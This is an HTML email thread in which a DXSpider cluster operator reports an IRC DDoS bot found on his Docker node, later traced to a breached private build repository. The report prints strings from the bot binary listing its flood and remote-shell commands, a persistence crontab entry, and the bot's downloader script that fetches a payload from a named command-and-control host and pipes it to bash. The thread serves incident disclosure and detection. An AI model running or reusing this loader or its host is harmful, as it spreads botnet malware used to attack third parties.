<div dir="ltr">FYI- I tracked it down. Sorry for the alarm.<div><br></div><div><br><br><div class="gmail_quote gmail_quote_container"><div dir="ltr" class="gmail_attr">---------- Forwarded message ---------<br>From: <strong class="gmail_sendername" dir="auto">Patrick Skerrett</strong> <span dir="auto"><<a href="mailto:patrick@skerrett.net">patrick@skerrett.net</a>></span><br>Date: Sat, Sep 6, 2025 at 12:45 PM<br>Subject: UPDATE: Suspicious traffic in my container - Scanbot<br>To: <<a href="mailto:sysops@dxcluster.info">sysops@dxcluster.info</a>><br></div><br><br><div dir="ltr"><div>I believe I tracked the source of this down..<br><br>The docker container build code that I use is stored on a private github repo. It looks like the repo itself was breached, and the malicious code was inserted into the build process itself.<br><br>So when we built & re-deployed the dxspider container the other day, the container was built with the IRC bot inserted into the build process itself. So the IRC launcher started up with the container.<br><br>That explains why the code was running as sysop, and it got into a private container without any other external access...<br><br>I am NOT using a public repo for the build, so anyone using a public Docker container for Dxspider is likely fine... This was a breach of my private code repository. <br><br><br>I think we are OK, and sorry for the alarm, but it doesn't hurt to check anyway for anomalous processes...<br><br>73,</div><div><br>Pat S.</div><div><br><br><br></div><br><div class="gmail_quote"><div dir="ltr" class="gmail_attr">On Sat, Sep 6, 2025 at 10:42 AM Patrick Skerrett <<a href="mailto:patrick@skerrett.net" target="_blank">patrick@skerrett.net</a>> wrote:<br></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr"><div dir="ltr">I run DxSpider as a docker container on my swarm cluster. I had a ping this morning from my IDS router that there was some command & control traffic to IRC coming from the node that runs DxSpider.<div><br></div><div>In looking, I found what looks like a DDOS bot deployed on my node, as the user 'sysop' (that the DXSpider user runs under). <br></div><div><br></div><div>*************<br>Considering the DXSpider server runs in an isolated container and the suspicious files were written as the 'sysop' owner, I think I have to conclude there is a vulnerability in the DxSpider software that allowed this payload to be deployed!!</div><div>*********</div><div><br>Here is the relevant info:<br><br>Payload was written to "/var/tmp/.. / " That is dot dot space <br><br>Obfuscated directory name to make it hard to navigate to.<br><br>The process itself is a compiled application called '-bash' <br><br>Trying to view it in a hex editor, I discovered these strings:<br><br><div>root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(http|tcp|connect|socket|bot|scan)" | head -10</div><div>NOTICE %s :Unable to create socket.</div><div>http://</div><div>NOTICE %s :Unable to connect to http.</div><div>NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd</div><div>[32m botnet</div><div>[36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp pass</div><div>[37m bot nick is required e.g</div><div>[37m bot ident is required e.g</div><div>[37m bot realname is required e.g</div><div>Not a socket<br><br><div>root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10</div><div>MODE %s +xi</div><div>JOIN %s :%s</div><div>PONG %s</div><div>JOIN %s</div><div>MODE %s +o %s</div><div>PRIVMSG</div><div>PING</div><div>JOIN</div><div>DT_JOINABLE</div><div>_PRIVMSG<br><br><div>root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i "NOTICE"</div><div>NOTICE %s :Unable to comply.</div><div>NOTICE %s :GET <host> <save as></div><div>NOTICE %s :Unable to create socket.</div><div>NOTICE %s :Unable to resolve address.</div><div>NOTICE %s :Unable to connect to http.</div><div>NOTICE %s :Receiving file.</div><div>NOTICE %s :Saved as %s</div><div>NOTICE %s :Spoofs: %d.%d.%d.%d</div><div>NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d</div><div>NOTICE %s :Bot by anonymous</div><div>NOTICE %s :NICK <nick></div><div>NOTICE %s :Nick cannot be larger than 9 characters.</div><div>NOTICE %s :DISABLE <pass></div><div>NOTICE %s :Current status is: %s.</div><div>NOTICE %s :Already disabled.</div><div>NOTICE %s :Password too long! > 254</div><div>NOTICE %s :Disable sucessful.</div><div>NOTICE %s :ENABLE <pass></div><div>NOTICE %s :Already enabled.</div><div>NOTICE %s :Wrong password</div><div>NOTICE %s :Password correct.</div><div>NOTICE %s :Removed all spoofs</div><div>NOTICE %s :What kind of subnet address is that? Do something like: 169.40</div><div>NOTICE %s :Unable to resolve %s</div><div>NOTICE %s :UDP <target> <port> <secs></div><div>NOTICE %s :Packeting %s.</div><div>NOTICE %s :PAN <target> <port> <secs></div><div>NOTICE %s :Panning %s.</div><div>NOTICE %s :TSUNAMI <target> <secs></div><div>NOTICE %s :Tsunami heading for %s.</div><div>NOTICE %s :UNKNOWN <target> <secs></div><div>NOTICE %s :Unknowning %s.</div><div>NOTICE %s :MOVE <server></div><div>NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls</div><div>NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers</div><div>NOTICE %s :UDP <target> <port> <secs> = A udp flooder</div><div>NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder</div><div>NOTICE %s :NICK <nick> = Changes the nick of the client</div><div>NOTICE %s :SERVER <server> = Changes servers</div><div>NOTICE %s :GETSPOOFS = Gets the current spoofing</div><div>NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet</div><div>NOTICE %s :DISABLE = Disables all packeting from this client</div><div>NOTICE %s :ENABLE = Enables all packeting from this client</div><div>NOTICE %s :KILL = Kills the client</div><div>NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd</div><div>NOTICE %s :VERSION = Requests version of client</div><div>NOTICE %s :KILLALL = Kills all current packeting</div><div>NOTICE %s :HELP = Displays this</div><div>NOTICE %s :IRC <command> = Sends this command to the server</div><div>NOTICE %s :SH <command> = Executes a command</div><div>NOTICE %s :Killing pid %d.</div><div>NOTICE %s :%s<br><br><br><br><br></div><div>This is obviously bad stuff..</div><div><br><br>**** HOW TO DETECT IF THIS IS ON YOUR NODE****<br><br>As sudo:<br><div> ps -ef |grep ScanBot</div><div>sysop 1990 1 0 09:40 ? 00:00:00 ScanBot</div><div><br><div># ls -l "/var/tmp/.. /"</div><div>total 5340</div><div>-rw-r----- 1 sysop sysop 72770 Sep 6 09:39 block.lst</div><div>drwxr-xr-x 2 sysop sysop 4096 Apr 3 02:55 bot</div><div>-rwxr-xr-x 1 sysop sysop 855 Feb 12 2023 clear</div><div>-rwxr-xr-x 1 sysop sysop 3272064 Oct 12 2023 curl</div><div>drwxr-xr-x 2 sysop sysop 4096 Sep 6 09:31 pass_files</div><div>-rwxr-xr-x 1 sysop sysop 2094872 Jul 13 2024 rm</div><div>-rwxr-xr-x 1 sysop sysop 499 Sep 6 09:29 scanbot</div><div>-rw-r--r-- 1 sysop sysop 0 Sep 6 10:35 scanbot.lst</div><div>drwxr-xr-x 2 sysop sysop 4096 Dec 7 2023 screen</div></div><div><br></div><div>It created a crontab entry for the sysop user:<br> /var/spool/cron/crontabs/sysop </div><div><div>root@node3:/var/tmp# cat /var/spool/cron/crontabs/sysop</div><div># DO NOT EDIT THIS FILE - edit the master and reinstall.</div><div># (- installed on Sat Sep 6 09:29:49 2025)</div><div># (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)</div><div>* * * * * "/var/tmp/.. "/scanbot<br><br>runs every minute and tries to re-download itself:<br><br><div>#!/bin/bash</div><div><br></div><div>cd "/var/tmp/.. "</div><div>shopt -s expand_aliases</div><div>alias curl="./curl"</div><div>type="randomscan"</div><div>host="<a href="http://cc.systemctl.cc" target="_blank">cc.systemctl.cc</a>"</div><div>api="scanbot.sh"</div><div>brute_type="spirit"</div><div>pubnick="<a href="mailto:sysop@98.46.184.64" target="_blank">sysop@98.46.184.64</a>"</div><div>privnick="<a href="mailto:sysop@98.46.143.4" target="_blank">sysop@98.46.143.4</a>"</div><div>scanbot()</div><div>{</div><div> url="$1"</div><div> if [ ! -z "$url" ]; then</div><div> url="url = \"$url\""</div><div> curl -K - << EOF</div><div> ipv4</div><div> fail</div><div> silent</div><div> connect-timeout = 60</div><div> max-time = 120</div><div> retry = 2</div><div> $url</div><div>EOF</div><div> sync</div><div> fi</div><div>}</div><div>scanbot $host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick | bash<br><br><br><br></div><br><br></div><br></div><div><br></div><div>************<br>Please check to see if anyone is running this process, if so, we may have a vulnerability that would allow the DXSpider cluster to become a DDOS C&C vector!!!<br>********<br><br><br><br></div><div><br></div><div><br></div><br></div><br></div><br></div><br><br></div></div></div></div></div></div></div></div></div></div></div>
</blockquote></div></div>
</div></div></div>